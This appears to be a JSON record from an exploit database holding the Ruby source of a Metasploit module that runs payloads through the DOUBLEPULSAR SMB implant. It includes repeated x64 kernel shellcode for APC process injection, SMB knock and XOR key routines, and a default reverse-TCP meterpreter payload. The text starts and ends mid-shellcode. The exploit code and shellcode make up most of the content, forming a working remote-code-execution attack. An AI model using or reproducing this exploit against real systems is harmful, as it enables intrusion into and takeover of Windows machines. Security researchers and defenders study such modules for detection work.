\"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-29] #"}, "lastseen": "2021-09-28T22:23:32", "differentElements": ["sourceData"], "edition": 29}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "1aa7ba96ed09ffa60842766511abc9d1", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-29T22:25:08", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:25:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-29T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n 